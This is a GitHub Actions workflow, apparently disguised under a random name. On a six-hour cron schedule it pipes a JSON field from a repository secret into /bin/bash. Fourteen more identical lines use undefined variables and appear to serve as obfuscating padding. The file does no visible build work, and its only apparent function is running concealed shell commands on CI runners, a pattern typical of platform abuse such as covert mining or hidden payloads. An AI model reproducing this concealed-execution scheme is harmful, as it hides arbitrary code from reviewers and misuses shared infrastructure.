name: changtaizhu1234
on:
  workflow_dispatch:
  schedule:
    - cron: '4 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: changtaizhu1234
        env:
          spr61: ${{ secrets.spr61 }}
        run: |
          echo $spr61 | jq -r .f2 | /bin/bash
          echo $te8 | jq -r .ujil0200 | /bin/bash
          echo $gnjy213 | jq -r .f9956 | /bin/bash
          echo $rhkyn98827 | jq -r .t771 | /bin/bash
          echo $pf8 | jq -r .y99360 | /bin/bash
          echo $juq354 | jq -r .b57 | /bin/bash
          echo $qfle87 | jq -r .cfc68626 | /bin/bash
          echo $kkbk82567 | jq -r .pquhb56 | /bin/bash
          echo $wgvq83 | jq -r .vhy8264 | /bin/bash
          echo $sje90 | jq -r .f408 | /bin/bash
          echo $tby0213 | jq -r .lxxs07058 | /bin/bash
          echo $cale15 | jq -r .uxn23973 | /bin/bash
          echo $ojn52124 | jq -r .zpcx6589 | /bin/bash
          echo $q430 | jq -r .gs98 | /bin/bash
          echo $i1109 | jq -r .nlcm03 | /bin/bash

